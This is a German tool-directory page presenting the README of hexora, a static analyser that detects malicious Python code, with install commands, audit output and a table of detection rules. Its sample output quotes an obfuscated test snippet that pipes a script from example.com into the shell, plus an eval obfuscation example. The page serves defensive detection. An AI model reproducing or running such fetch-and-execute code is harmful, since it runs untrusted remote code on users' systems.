Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
hexora — Statische Analyse von bösartigem Python-Code | Kitploit
Tools/GitHubGitHub/rushter/hexora
Management von Indicators of Compromise (IOC)Statische AnalyseSchwachstellenanalyseCode-AnalyseMalware-AnalyseLieferkettensicherheitMaschinelles Lernen
GitHubrushter/hexora

hexora

Statische Analyse von bösartigem Python-Code

Repository anzeigen
1688vor 14 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

hexora

PyPI - Version

Hexora ist ein statisches Analysetool, das darauf ausgelegt ist, bösartige und schädliche Muster in Python-Code zu erkennen. Es kombiniert eine regelbasierte statische Analyse-Engine mit einem maschinell gelernten Modell, das gesamte Quelldateien bewertet, um sie als bösartig oder harmlos zu klassifizieren.

Es kann verwendet werden, um:

  • Projektabhängigkeiten zu prüfen, um potenzielle Supply-Chain-Angriffe zu erkennen
  • Bösartige Skripte zu erkennen, die auf Plattformen wie Pastebin, GitHub oder offenen Verzeichnissen gefunden werden
  • IoC-Dateien aus vergangenen Sicherheitsvorfällen zu analysieren
  • Neue Pakete zu prüfen, die auf PyPI hochgeladen werden.
Hexora example

Beispiele

Für Ausgabebeispiele siehe bitte die Datei docs/examples.md.

Installation

Mit Python

Erfordert Python 3.9+.

root@kitploit:~
pip install hexora

Mit uv:

root@kitploit:~
uv tool install hexora

Verwendung

root@kitploit:~
hexora --help

Einzelne Datei prüfen

root@kitploit:~
>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.
    Machine learning based score for file: 0.93

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

Verzeichnis prüfen

root@kitploit:~
hexora audit --output-format terminal resources/test/

Pakete aus der virtuellen Umgebung prüfen

root@kitploit:~
hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

Wobei python3.11 die Version des Python in der virtuellen Umgebung ist.

Tipps:

  • Verwenden Sie --exclude, um bestimmte Regelcodes (z. B. laute Importe) für einen bestimmten Durchlauf zu unterdrücken.
  • Verwenden Sie --min-confidence, um sich nur auf Ergebnisse mit hoher Konfidenz zu konzentrieren.

Konfidenz gibt an, wie sicher ein bestimmtes Code-Stück bösartig ist. Manche Bibliotheken oder Code-Snippets werden zu legitimen Zwecken verwendet, und es ist schwer, legitime Anwendungsfälle von bösartigen zu unterscheiden. Deshalb haben einige Übereinstimmungen eine niedrige Konfidenzstufe.

Einige Regeln können unterschiedliche Konfidenzstufen haben. Vermeiden Sie es, viele Regeln nach Codes zu filtern, es sei denn, Sie sind sich sehr sicher. Beispielsweise können Code- und Shell-Ausführung mittlere, hohe und sehr hohe Konfidenz haben. Dies hängt davon ab, wie der Code ausgeführt wurde. Wenn wir einen Verschleierungsversuch erkennen, erhöhen wir die Konfidenz.

Zum Beispiel hat dieser Code eine hohe Konfidenz:

root@kitploit:~
globals()["__builtins__"].eval("print(123)")

Verwendung in Python

root@kitploit:~
>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'pyperclip can be used to copy and paste data from '
                           'the clipboard.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'Reading from the clipboard can be used to '
                           'exfiltrate sensitive data.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # Single file audit
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...

Testen gegen bösartige Datensätze

Beim Entwickeln neuer Regeln können Sie vorhandene bösartige Datensätze wie malicious-software-packages-dataset verwenden.

Nach dem Klonen zeigen Sie das Benchmarking-Tool auf das Datensatzverzeichnis:

root@kitploit:~
cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

Verfügbare Regeln

Regelmäßig werden neue Regeln hinzugefügt.

Derzeit sind folgende Regeln verfügbar:

Danksagungen

Für das Parsen verwenden wir den AST-Parser aus der ruff-Bibliothek.

Tool herunterladen
CodeNameBeschreibung
HX1000AppEnumerationVerdächtige Aufzählung von Anwendungen.
HX1010BrowserEnumerationVerdächtige Aufzählung des Browsers (Apps, Cookies, Verlauf usw.).
HX1020PathEnumerationVerdächtige Aufzählung von Pfaden.
HX1030OSFingerprintVerdächtiges Fingerprinting des Betriebssystems.
HX2000ClipboardReadLesen der Zwischenablage.
HX2010EnvAccessZugriff auf eine sensible Umgebungsvariable.
HX2020ScreenshotCaptureErstellen von Screenshots des Bildschirms.
HX3000CodeExecMögliche Code-Ausführung.
HX3010ShellExecAusführung eines Shell-Befehls.
HX3040DLLInjectionMögliche DLL-Injektion.
HX3050DangerousExecAusführung eines potenziell gefährlichen Befehls innerhalb eines Shell-Befehls.
HX3060SuspiciousCallVerdächtiger Funktionsaufruf.
HX4000ObfuscatedShellExecAusführung eines möglicherweise verschleierten Shell-Befehls.
HX4010ObfuscatedCodeExecAusführung von möglicherweise verschleiertem Code.
HX5000DunderImportVerdächtige Verwendung von __import__.
HX5010SuspiciousImportVerdächtiger Import.
HX5020CtypesImportVerdächtiger ctypes-Import.
HX5030PickleImportVerdächtiger pickle-Import.
HX5040StructImportVerdächtiger struct-Import.
HX5050SocketImportVerdächtiger socket-Import.
HX5060MarshalImportVerdächtiger marshal-Import.
HX6000Base64StringLanger Base64-codierter String erkannt; mögliche Code-Verschleierung.
HX6010HexedLiteralsListe hex-codierter Literale erkannt; mögliche Nutzlast.
HX6020HexedStringLanger hex-codierter String erkannt; mögliche Nutzlast.
HX6030IntLiteralsGroße Liste ganzzahliger Literale erkannt; mögliche Code-Verschleierung.
HX6040CVEInLiteralLiteral enthält eine CVE-Kennung.
HX6050SuspiciousLiteralVerdächtiges Literal erkannt; mögliche Datenaufzählung.
HX6060PathTraversalVerdächtiger Pfad-Traversal.
HX6070BrowserExtensionAufzählung sensibler Browsererweiterungen.
HX6080WebHookVerdächtiger Webhook erkannt; mögliche Datenexfiltration.
HX6090TelegramTokenTelegram-Bot-Token in Zeichenkettenliteral erkannt.
HX7000SuspiciousFunctionNameVerdächtiger Funktionsname.
HX7010SuspiciousParameterNameVerdächtiger Parametername.
HX7020SuspiciousVariableVerdächtiger Variablenname.
HX9000DataExfiltrationPotenzielle Datenexfiltration.
HX8000BinaryDownloadVerdächtiger Download einer Binärdatei.
HX8010BuiltinsVariableVerdächtige Verwendung einer Builtin-Variable.
HX8020SuspiciousCommentVerdächtiger Kommentar.
HX8030SuspiciousWriteVerdächtiger Schreibzugriff auf das Dateisystem.
HX8040InstallHookVerdächtige Einrichtung eines Install-Hooks.